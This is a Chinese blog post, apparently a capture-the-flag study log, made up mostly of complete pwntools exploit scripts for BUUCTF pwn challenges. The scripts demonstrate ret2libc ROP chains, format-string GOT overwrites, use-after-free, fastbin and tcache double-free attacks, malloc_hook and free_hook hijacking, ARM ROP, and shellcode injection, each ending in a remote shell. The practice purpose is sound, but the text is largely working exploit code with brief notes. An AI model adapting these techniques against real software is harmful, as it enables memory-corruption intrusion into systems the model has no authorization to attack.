# context(arch = ‘i386‘, os = ‘linux‘, endian = ‘little‘)
context.log_level = ‘debug‘
# context.terminal = [‘tmux‘, ‘splitw‘, ‘-h‘]
elf = ELF(‘./bjdctf_2020_babyrop‘)
# libc = ELF(‘./libc.so.6‘)

ip = ‘node3.buuoj.cn‘
port = 29516
debug = 0

if debug == 1:
    p = process(‘./bjdctf_2020_babyrop‘)
else:
    p = remote(ip,port)
    # p = remote(‘127.0.0.1‘,10001)

pop_rdi = 0x0000000000400733
offset = 32
start_addr = 0x000000000400530
main_addr = 0x4006ad
read_got = elf.got[‘read‘]
read_plt = elf.sym[‘read‘]
puts_got = elf.got[‘puts‘]
puts_plt = elf.sym[‘puts‘]
pop3_ret = 0x000000000040072e

# gdb.attach(p,‘b *0x00000000040067E‘)

payload = offset *‘a‘ + ‘b‘*8 + p64(pop_rdi) + p64(puts_got) + p64(puts_plt) + p64(main_addr)
p.recv()

p.sendline(payload)
puts_addr = u64(p.recv(6).ljust(8,‘\x00‘))
print hex(puts_addr)
# read_addr = u64(p.recv(6).ljust(8,‘\x00‘))
# print hex(read_addr)

# libc = LibcSearcher(‘read‘,read_addr)
# libcbase = read_addr - libc.dump(‘read‘)
libc = LibcSearcher(‘puts‘,puts_addr)
libcbase = puts_addr - libc.dump(‘puts‘)
system_addr = libcbase + libc.dump(‘system‘)
bin_sh_addr = libcbase + libc.dump(‘str_bin_sh‘)
print ‘----------libcbase = ‘,hex(libcbase)
print ‘----------system_addr = ‘,hex(system_addr)
print ‘----------bin_sh_addr = ‘,hex(bin_sh_addr)


payload2 = offset * ‘a‘ + ‘b‘*8 + p64(pop_rdi) + p64(bin_sh_addr) + p64(system_addr)
p.recv()
p.sendline(payload2)

#gdb.attach(p)
p.interactive()

jarvisoj_level3

关键词:栈溢出、bss段地址写入‘/bin/sh‘

#!python
#coding:utf-8

from pwn import *
import binascii
from LibcSearcher import *
context(arch = ‘amd64‘, os = ‘linux‘, endian = ‘little‘)
# context(arch = ‘i386‘, os = ‘linux‘, endian = ‘little‘)
context.log_level = ‘debug‘
# context.terminal = [‘tmux‘, ‘splitw‘, ‘-h‘]
elf = ELF(‘./level3‘)
# libc = ELF(‘./libc.so.6‘)

ip = ‘node3.buuoj.cn‘
port = 27623
debug = 0

if debug == 1:
    p = process(‘./level3‘)
else:
    p = remote(ip,port)
    # p = remote(‘127.0.0.1‘,10001)


read_got = elf.got[‘read‘]
read_plt = elf.sym[‘read‘]
write_got = elf.got[‘write‘]
write_plt = elf.sym[‘write‘]
offset = 136
main_addr = elf.sym[‘main‘]
start_addr = 0x8048350
data_addr = 0x804A022
leave_ret = 0x8048482

payload = offset * ‘a‘ + ‘bbbb‘ + p32(write_plt) + p32(main_addr) + p32(1) + p32(write_got) + p32(4)

p.recv()
p.sendline(payload)
write_addr = u32(p.recv(4))
print ‘---------write_addr = ‘,hex(write_addr)

libc = LibcSearcher(‘write‘,write_addr)
libc_base =write_addr - libc.dump(‘write‘)
system_addr = libc_base + libc.dump(‘system‘)
bin_sh_addr = libc_base + libc.dump(‘str_bin_sh‘) #no str_bin_sh


payload1 = offset * ‘a‘ + ‘bbbb‘ + p32(read_plt) + p32(start_addr) + p32(0) + p32(data_addr) + p32(8)

p.recv()
p.sendline(payload1)
p.sendline(‘/bin/sh‘)

payload2 = offset * ‘a‘ + ‘bbbb‘ + p32(system_addr) + p32(main_addr) + p32(data_addr)
print p.recv()
p.sendline(payload2)

p.interactive()

[BJDCTF 2nd]r2t4

关键词:64位格式化字符串漏洞(有6个参数存在寄存器中)

#!python
#coding:utf-8

from pwn import *
from LibcSearcher import *
context(arch = ‘amd64‘, os = ‘linux‘, endian = ‘little‘)
# context(arch = ‘i386‘, os = ‘linux‘, endian = ‘little‘)
context.log_level = ‘debug‘
elf = ELF(‘./r2t4‘)
# libc = ELF(‘./libc.so.6‘)

ip = ‘node3.buuoj.cn‘
port = 29997
debug = 0

if debug == 1:
    p = process(‘./r2t4‘)
else:
    p = remote(ip,port)
    # p = remote(‘127.0.0.1‘,10001)

back_door = 0x000000000400626
read_got = elf.got[‘read‘]
stack_chk_fail = elf.got[‘__stack_chk_fail‘]

offset = 2+6

payload = ‘%64c%9$hn%1510c%10$hnaaa‘+p64(stack_chk_fail+2) + p64(stack_chk_fail) 

p.sendline(payload)

#gdb.attach(p)
p.interactive()

hitcontraining_uaf

关键词:uaf、堆溢出

#!python
#coding:utf-8

from pwn import *
import binascii
from LibcSearcher import *
# context(arch = ‘amd64‘, os = ‘linux‘, endian = ‘little‘)
context(arch = ‘i386‘, os = ‘linux‘, endian = ‘little‘)
context.log_level = ‘debug‘
context.terminal = [‘tmux‘, ‘splitw‘, ‘-h‘]
elf = ELF(‘./hacknote‘)
# libc = ELF(‘./libc.so.6‘)

ip = ‘node3.buuoj.cn‘
port = 25882
debug = 0

if debug == 1:
    p = process(‘./hacknote‘)
else:
    p = remote(ip,port)
    # p = remote(‘127.0.0.1‘,10001)

def add_note(Size,content):
    p.recvuntil(‘Your choice :‘)
    p.sendline("1")
    p.recvuntil(‘Note size :‘)
    p.sendline(str(int(Size)))
    p.recvuntil(‘Content :‘)
    p.sendline(content)

def del_note(Index):
    p.recvuntil(‘choice :‘)
    p.sendline(‘2‘)
    p.recvuntil(‘Index :‘)
    p.sendline(str(Index))

def print_note(Index):
    p.recvuntil(‘choice :‘)
    p.sendline(‘3‘)
    p.recvuntil(‘Index :‘)
    p.sendline(str(Index))

magic_addr= 0x8048945

# raw_input()
add_note(0x10,‘aaa‘)  #00-01
add_note(0x10,‘bbb‘)  #10-11
add_note(0x40,‘ddd‘)  #20-21

del_note(1)  #de10  de11
del_note(0)  #de00  de01
# raw_input()
add_note(0x8,p32(magic_addr))   #add00-add10
print_note(1)   #eip-->10

p.interactive()

[V&N2020 公开赛]simpleHeap

关键词:off-by-one、malloc_hook改写、unsortbin泄露libc信息

#!python
#coding:utf-8

from pwn import *
import binascii
from LibcSearcher import *
# context(arch = ‘amd64‘, os = ‘linux‘, endian = ‘little‘)
context(arch = ‘i386‘, os = ‘linux‘, endian = ‘little‘)
context.log_level = ‘debug‘
# context.terminal = [‘tmux‘, ‘splitw‘, ‘-h‘]
elf = ELF(‘./vn_pwn_simpleHeap‘)
# libc = ELF(‘./libc‘)

ip = ‘node3.buuoj.cn‘
port = 29141
debug = 0

if debug == 1:
    p = process(‘./vn_pwn_simpleHeap‘)
else:
    p = remote(ip,port)
    # p = remote(‘127.0.0.1‘,10001)

def add(Size,Content):
    p.recvuntil(‘choice: ‘)
    p.sendline(‘1‘)
    p.recvuntil(‘size?‘)
    p.sendline(str(Size))
    p.recvuntil(‘content:‘)
    p.sendline(Content)
def edit(idx,Content):
    p.recvuntil(‘choice: ‘)
    p.sendline(‘2‘)
    p.recvuntil(‘idx?‘)
    p.sendline(str(idx))
    p.recvuntil(‘content:‘)
    p.sendline(Content)
    pass
def show(idx):
    p.recvuntil(‘choice: ‘)
    p.sendline(‘3‘)
    p.recvuntil(‘idx?‘)
    p.sendline(str(idx))
    pass
def delete(idx):
    p.recvuntil(‘choice: ‘)
    p.sendline(‘4‘)
    p.recvuntil(‘idx?‘)
    p.sendline(str(idx))
    pass
def exit():
    p.recvuntil(‘choice: ‘) 
    p.sendline(‘5‘)
    pass

# raw_input(‘pause‘)   #b *$rebase(0xf07)
add(24,‘0000\n‘) #0x18+0x10
add(96,‘1111\n‘) #0x60+0x10
add(96,‘2222\n‘) #0x60+0x10
add(16,‘3333\n‘) #0x10+0x10  

payload = ‘a‘*0x18 + ‘\xe1‘     #rewrite next chunk low addr-->size

edit(0,payload)
# gdb.attach(p,"b *$rebase(0xf07)")
delete(1)
add(96,‘1112\n‘)
show(2)
main_arena = u64(p.recvline()[:-1].ljust(8,‘\x00‘))-88
print hex(main_arena)

libcbase = main_arena - 0x3C4B20
malloc_hook = libcbase + 0x0000000003c4b10
realloc_hook = libcbase + 0x0000000003c4b08
free_hook = libcbase + 0x0000000003c67a8
one_gadget_addr = [0x45216,0x4526a,0xf02a4,0xf1147]
print ‘------malloc_hook =‘,hex(malloc_hook)
print ‘------realloc_hook =‘,hex(realloc_hook)
print ‘------free_hook =‘,hex(free_hook)

add(96,‘4444\n‘)
# gdb.attach(p,"b *$rebase(0xf07)")
delete(4)

payload2 = p64(malloc_hook - 0x23)
edit(2,payload2)
add(96,‘5555\n‘)

payload3 = ‘a‘*0x13+p32(one_gadget_addr[2]) 
add(96,payload3)

p.interactive()

堆的六种利用手法https://bbs.pediy.com/thread-246786.htm

jarvisoj_test_your_memory

关键词:scanf函数的栈溢出

#!python
#coding:utf-8

from pwn import *
from LibcSearcher import *
# context(arch = ‘amd64‘, os = ‘linux‘, endian = ‘little‘)
context(arch = ‘i386‘, os = ‘linux‘, endian = ‘little‘)
context.log_level = ‘debug‘
elf = ELF(‘./memory‘)
# libc = ELF(‘./libc.so.6‘)

ip = ‘node3.buuoj.cn‘
port = 28649
debug = 0

if debug == 1:
    p = process(‘./memory‘)
else:
    p = remote(ip,port)
    # p = remote(‘127.0.0.1‘,10001)

cat_flag_addr = 0x80487e0
main_addr = 0x8048677
system_addr = 0x8048440

payload = ‘a‘*0x13+‘bbbb‘+p32(system_addr) + p32(main_addr) + p32(cat_flag_addr)

# p.recv()
p.sendline(payload)

p.interactive()

[ZJCTF 2019]Login

关键词:64位c++程序、程序(**a1)(&s)执行栈上地址、strcmp函数\x00截断绕过判断

#!python
#coding:utf-8

from pwn import *
from LibcSearcher import *
context(arch = ‘amd64‘, os = ‘linux‘, endian = ‘little‘)
# context(arch = ‘i386‘, os = ‘linux‘, endian = ‘little‘)
context.log_level = ‘debug‘
elf = ELF(‘./login‘)
# libc = ELF(‘./libc.so.6‘)

ip = ‘node3.buuoj.cn‘
port = 25531
debug = 0

if debug == 1:
    p = process(‘./login‘)
else:
    p = remote(ip,port)
    # p = remote(‘127.0.0.1‘,10001)

get_shell = 0x0000000000400E88
name = ‘admin‘
passwd = ‘2jctf_pa5sw0rd\0‘.ljust(72,‘\0‘) + p64(get_shell)
p.recv()
p.sendline(name)
p.recv()
p.sendline(passwd)

#gdb.attach(p)
p.interactive()

[ZJCTF 2019]EasyHeap

关键词:fastbin attack、堆溢出、heap of spirit、

key:通过数组头指针到free_got的地址,再修改第一个数组的值从而达到修改free_got的值(system_plt),再在heap中存放‘/bin/sh\x00‘作为参数,调用free达到了system(‘‘/bin/sh\x00‘;xxxxxx;xxxxx),\x00会自动截断

#!python
#coding:utf-8

from pwn import *
from LibcSearcher import *
context(arch = ‘amd64‘, os = ‘linux‘, endian = ‘little‘)
# context(arch = ‘i386‘, os = ‘linux‘, endian = ‘little‘)
context.log_level = ‘debug‘
elf = ELF(‘./easyheap‘)
# libc = ELF(‘./libc.so.6‘)

ip = ‘node3.buuoj.cn‘
port = 25097
debug = 0

if debug == 1:
    p = process(‘./easyheap‘)
else:
    p = remote(ip,port)
    # p = remote(‘127.0.0.1‘,10001)

cat_flag_addr = 0x000000000400C23

def add(Size,Content):
    p.recvuntil(‘choice :‘)
    p.sendline(‘1‘)
    p.recvuntil(‘Size of Heap :‘)
    p.send(str(Size))
    p.recvuntil(‘Content of heap:‘)
    p.send(Content)

def edit(Index,Size,Content):
    p.recvuntil(‘choice :‘)
    p.sendline(‘2‘)
    p.recvuntil(‘Index :‘)
    p.sendline(str(Index))
    p.recvuntil(‘Size of Heap :‘)
    p.sendline(str(Size))
    p.recvuntil(‘Content of heap :‘)
    p.send(Content)

def delelte(Index):
    p.recvuntil(‘choice :‘)
    p.sendline(‘3‘)
    p.recvuntil(‘Index :‘)
    p.sendline(str(Index))

def exit():
    p.recvuntil(‘choice :‘)
    p.sendline(‘4‘)

free_got = elf.got[‘free‘]
#0x6020ad
system_addr = elf.sym[‘system‘]
print ‘----system_add = ‘ + hex(system_addr)
print ‘----free_got = ‘ + hex(free_got)
raw_input(‘pause‘)
add(96,‘0000\n‘)  #0
add(96,‘1111\n‘)  #1
add(96,‘2222\n‘)  #2
add(16,‘3333\n‘)  #3

delelte(2)
paylaod = ‘/bin/sh\x00‘ + ‘a‘*88 + p64(0) + p64(0x71) + p64(0x6020ad)
edit(1,len(paylaod),paylaod)

add(96,‘4444\n‘)  #2
paylaod2 = ‘b‘*0x20 + ‘bbb‘+ p64(free_got)
add(96,paylaod2)  #4

paylaod3 = p64(system_addr)
edit(0,len(paylaod3),paylaod3)

delelte(1)

#gdb.attach(p)
p.interactive()

jarvisoj_typo

关键词:32位arm、arm栈溢出、arm下的ROP、无符号

key:本应该用rizzo工具恢复符号,然后找出system_plt函数地址,但是不知道为什么用不上(可以通过寻找/bin/sh来定位system函数的地址),这里贴出找到的system位置进行mark(眼熟)一下。

技术图片

#!python
#coding:utf-8

from pwn import *
from LibcSearcher import *
context(arch = ‘amd64‘, os = ‘linux‘, endian = ‘little‘)
# context(arch = ‘i386‘, os = ‘linux‘, endian = ‘little‘)
context.log_level = ‘debug‘
elf = ELF(‘./typo‘)
# libc = ELF(‘./libc.so.6‘)

ip = ‘node3.buuoj.cn‘
port = 29978
debug = 0

if debug == 1:
    p = process(‘./typo‘)
else:
    p = remote(ip,port)
    # p = remote(‘127.0.0.1‘,10001)

pop_r0_r4_pc = 0x00020904
str_bin_sh = 0x0006c384
# system_addr = [0x0006c986,]
# system_addr1 = elf.plt[‘system‘]
# print ‘system_addr1 = ‘,hex(system_addr1)
system_addr = 0x110B4


p.recvuntil(‘want to quit\n‘)
p.sendline()
p.recv()

payload = ‘a‘ * 112 + p32(pop_r0_r4_pc) + p32(str_bin_sh) + p32(1) + p32(system_addr)
p.sendline(payload)

#gdb.attach(p)
p.interactive()

starctf_2019_girlfriend

关键词:uaf、double free、unsortbin泄露地址信息、修改malloc_hook

buuctf的这个题目是在ubuntu16环境下的、不用考虑tcache

#!python
#coding:utf-8

from pwn import *
from LibcSearcher import *
context(arch = ‘amd64‘, os = ‘linux‘, endian = ‘little‘)
# context(arch = ‘i386‘, os = ‘linux‘, endian = ‘little‘)
# context.log_level = ‘debug‘
elf = ELF(‘./starctf_2019_girlfriend‘)
libc = ELF(‘./libc-2.23.so‘)

ip = ‘node3.buuoj.cn‘
port = 29337
debug = 0

if debug == 1:
    p = process(‘./starctf_2019_girlfriend‘)
else:
    p = remote(ip,port)
    # p = remote(‘127.0.0.1‘,10001)

def add(size,name=‘‘,call=‘‘):
    p.sendlineafter(‘:‘,‘1‘)
    p.sendlineafter(‘name‘,str(size))
    p.sendlineafter(‘name:‘,name)
    p.sendlineafter(‘call:‘,call)

def show(idx):
    p.sendlineafter(‘:‘,‘2‘)
    p.sendlineafter(‘index:‘,str(idx))
    p.recvuntil(‘name:\n‘)

def free(idx):
    p.sendlineafter(‘:‘,‘4‘)
    p.sendlineafter(‘index:‘,str(idx))

# raw_input(‘----------------gdb waiting----------------‘)


add(0x80, ‘chunk0\n‘, ‘0000‘)#0
add(0x68, ‘chunk1\n‘, ‘1111‘)#1
add(0x68, ‘chunk2\n‘, ‘2222‘)#2
add(0x68, ‘/bin/sh\n‘, ‘3333‘)#3


free(0)
show(0)


# main_arena = u64(p.recv(6).ljust(8,‘\x00‘)) -88
malloc_hook = u64(p.recv(6).ljust(8,‘\x00‘)) -88 - 0x10
# print ‘main_arena = ‘ ,hex(main_arena)
print ‘malloc_hook =‘,hex(malloc_hook)

# libcbase = main_arena - 0x3B1C40
libcbase = malloc_hook - libc.sym[‘__malloc_hook‘]
system_addr = libcbase + libc.sym[‘system‘]
realloc = libcbase + libc.sym[‘realloc‘]
free_gook_addr = libcbase + libc.sym[‘__free_hook‘]
one_gadget_offset = [0x45216,0x4526a,0xf02a4,0xf1147]
one_gadget = libcbase + one_gadget_offset[3]
# success("main_arena:"+hex(main_arena))
success("libcbase:"+hex(libcbase))

free(1)
free(2)
free(1)

add(0x68,p64(malloc_hook-0x23)+‘\n‘,‘2111‘)  #key chunk
add(0x68,‘2222\n‘,‘2111‘) 
add(0x68,‘2111\n‘,‘2111‘) 
payload = ‘a‘* (0x13-8) + p64(one_gadget) + p64(realloc)
add(0x68,payload,‘4444‘)

p.recv()
#then send ‘1‘ can get shell

p.interactive()

关键词:uaf、double free、unsortbin泄露地址信息、tcache attack、

环境在ubuntu19.04下,libc-2.2.9.so需要通过tcache(2.26以后都需要考虑)

可以申请一个较大的chunk,大于等于0x420,释放后直接进入largebin,然后show进行libc的泄露,从而计算处libc_base,得到相关的地址(malloc_hook、system、onegadget、free_hook等)

name = "aaaa"
phone = ‘1‘*0xc


add(0x440,name,phone) #0 put into largebin
add(0x18,name,phone) #1
delete(0)
show(0)
p.recvuntil("name:\n")
leak_addr = u64(p.recv(6).ljust(8,‘\x00‘))
print "leak_addr:",hex(leak_addr)
libc_base = leak_addr - libc.symbols["__malloc_hook"] - 0x70
print "libc_base:",hex(libc_base)

free_hook = libc_base + libc.symbols["__free_hook"]
one_gadget = libc_base + 0xdf99d
system = libc_base + libc.symbols["system"]
malloc_hook = libc_base + libc.symbols["__malloc_hook"]

通过申请7个chunk+2个chunk共9个chunk,free出7个fastbin大小的chunk填充tcache,然后利用多余的两个chunk制造出double free。

add(0x440,name,phone) #2

for i in range(7): 
    add(0x68,name,phone) #3~9 malloc from unsorted bin


add(0x68,name,phone) #10 malloc from top chunk
add(0x68,name,phone) #11

delete(9)

for i in range(6):
    delete(i+3) #3~8

add(0x68,name,phone) #12 == 8 0x580
add(0x68,name,phone) #13 == 7 0x4f0

##fill tcache
delete(10)
delete(11)

##double free
##fastbin 12->13->12
delete(12)
delete(13)
delete(12)

然后把tcache中的fastbin全部malloc出来,tcache清空后再malloc时,就会将fastbin里的chunk放入tcache,就能得到被我们double free的2个chunk,从而复写任意地址。(这里复写了free_hook的地址,然后free传入/bin/sh的chunk时,就会触发system(/bin/sh)从而get shell)

##empty tcache
for i in range(7):
   add(0x68,name,phone) #14~20

add(0x68,p64(free_hook),phone) #21 == 12 fastbin 0x70 chunks put into tcache
add(0x68,name,phone) #22 == 13
add(0x68,"/bin/sh\x00",phone) #23 == 12
add(0x68,p64(system),phone) #24

##trigger
delete(23)

starctf_2019_babyshell

关键词:汇编指令、shellcraft、\x00截断。

还有个其他方法的链接:https://www.cnblogs.com/Rookle/p/12895895.html

from pwn import *
context.log_level=‘debug‘
context.arch=‘amd64‘
p=process(‘./starctf_2019_babyshell‘)
#gdb.attach(p,‘b *0x4008cb‘)
# p=remote("34.92.37.22",10002)

shellcode = asm(shellcraft.sh())


p.sendlineafter(":","\x00ng"+shellcode) #gs\njaZ
p.interactive()

starctf_2019_upxofcpp

关键词:upx脱壳、heap段可执行的upx、uaf、vtable call to run shellcode

知识点:asm(jmp .+_n) jmp .+0x10表示跳当前地址+0x10,可能是2字节或者5字节主要看n和符号例如+0x81-0x7e (shellcode可以不连续了,还可以往回跳.)

  • Fake the vtable via malloc_consolidate, write your shellcode on the heap
  • Trigger the UAF vulnerability by remove or show, then call rax will jump on the shellcode
  • Details in solve.py
  • It has nothing to do with libc ??

思路 exp

from pwn import *
# p = process(‘./starctf_2019_upxofcpp‘)
p = remote(‘node3.buuoj.cn‘,29685)

context.log_level=‘debug‘
def add(index,size,content):
    p.recvuntil(‘choice:‘)
    p.sendline(‘1‘)
    p.recvuntil(‘Index:‘)
    p.sendline(str(index))
    p.recvuntil(‘Size:‘)
    p.sendline(str(size))
    p.recvuntil(‘stop:‘)
    p.sendline(content)
def delete(index):
    p.recvuntil(‘choice:‘)
    p.sendline(‘2‘)
    p.recvuntil(‘index:‘)
    p.sendline(str(index))
def show(index):
    p.recvuntil(‘choice:‘)
    p.sendline(‘4‘)
    p.recvuntil(‘index:‘)
    p.sendline(str(index))

# gdb.attach(p)
payload = ‘‘‘
    mov rax,0x68732f6e69622f
    push rax
    push rsp
    pop rdi
    mov rsi,0
    mov rdx,0
    mov rax,0x3b
    syscall
‘‘‘
print len(asm(payload,arch=‘amd64‘))
payload = asm(payload,arch=‘amd64‘)
#print len(payload)
result =‘‘
i = 0
while i<35:
    result+=str(struct.unpack(‘<i‘,payload[i:i+4])[0])+‘ ‘
    i+=4
result+=‘-1‘
print result
add(0,0x22,‘-1‘)
gdb.attach(p)
add(1,0x12,‘1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 2095775979 -1‘)
raw_input(‘go‘)
add(2,0x8,‘-1‘)
raw_input(‘go‘)
#add(1,0x8,‘1 2 1156288656 -1‘)
add(3,0x50,result)
raw_input(‘go‘)
#add(4,0x22,‘-1‘)
#add(3,0x22,‘-1‘)
delete(2)
raw_input(‘go‘)
delete(1)
raw_input(‘go‘)
delete(0)
#gdb.attach(p)
#delete(3)
show(0)
p.interactive()

Buuctf刷题:部分

标签:note   exe   lookup   rmi   move   split   recv   不用   大小   

原文地址:https://www.cnblogs.com/yidianhan/p/13191744.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!